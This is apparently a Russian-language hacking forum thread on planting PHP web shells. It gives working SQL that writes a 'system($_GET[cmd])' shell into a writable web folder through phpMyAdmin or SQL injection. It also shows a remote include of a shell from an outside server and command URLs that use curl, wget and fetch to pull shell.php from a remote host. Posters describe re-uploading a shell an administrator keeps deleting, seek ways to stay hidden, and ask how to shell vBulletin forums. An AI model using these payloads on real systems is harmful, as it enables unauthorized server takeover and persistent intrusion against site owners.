Cоздаем таблицу, например 'hack' с колонкой 'shell'
CREATE TABLE 'hack' ('shell' TEXT);
Записываем в базу скрипт который должен инклудить шелл с сервера
INSERT INTO 'hack' ('shell') VALUES ('<? include 'http://сервер с шеллом' ?>');
Ищем папку с правами на запись uploads,images,etc.
Подставляем путь в запрос: SELECT shell FROM 'hack' INTO OUTFILE '/home/сайт/www/uploads/shell.php';

SELECT '<? system($_GET[cmd]); ?>' from mysql.user into outfile '/var/www/html/site/tmp/shel.php';

www.site.com/shel.php?cmd=ls
shel.php?cmd=curl --output /papka/na/servere/shell.php http://www.site.ru/shell.txt
shel.php?cmd=wget -o /papka/na/servere/shell.php http://www.site/shell.txt
shel.php?cmd=get http://www.site.ru/shell.txt > /papka/na/servere/shell.php
shel.php?cmd=fetch -o /papka/na/servere/shell.php http://www.site.ru/shell.txt

путь нужен полюбом

ну да, но меня интересовало как залить шелл именно через phpmyadmin.
спсасибо но я уже разобрался просто ты похоже описал как залить шелл через сиквел инжекцию...

кстати единственное с чем возникла трудность при заливке так это синтаксис
select * from 'table' into outfile 'путь' -не правильно
select * from `table` into outfile 'путь' -так правильно
а весь прикол в кавычках оказалсо

ппц. я в шоке ну и админ попался 4 раз шелл лью а он его удаляет!!! при всем том что код обфусцирован... и сам файл я вроде переименовывал,прятал...
как можно по другому остатся в системе?

Возможно на сервере кроном гоняеться скрипт, который дропает файлы по дате создания и весу.

O_o а по человечески можешь объяснить?

547 ты не прав, я описал именно как залить шелл через пхпмайадмин, обращатся все равно через БД, поэтому и синтаксис одинаковый, я не раз заливал через пхпадмина именно так, конечно нужен юзер рут и папка с правами на запись и соответсвенно сам путь до папки.

а по поводу как спрятать шелл от злобного админа есть способ который описал Dimi4 ..вот собственно и link
смотри в самом низу статьи

Что еще объяснять? Есть аккаунты модератора на двух форумах- vbulletin 4.0.2 и vbulletin 3.8.5. Нужно залить шелл. Старые баги с заливкой через предупреждения и репутацию- не работают.

как раскручивать скули, если значение не int ?
например,
view_all.php?part=analit'

ошибка :

Так же как и всегда.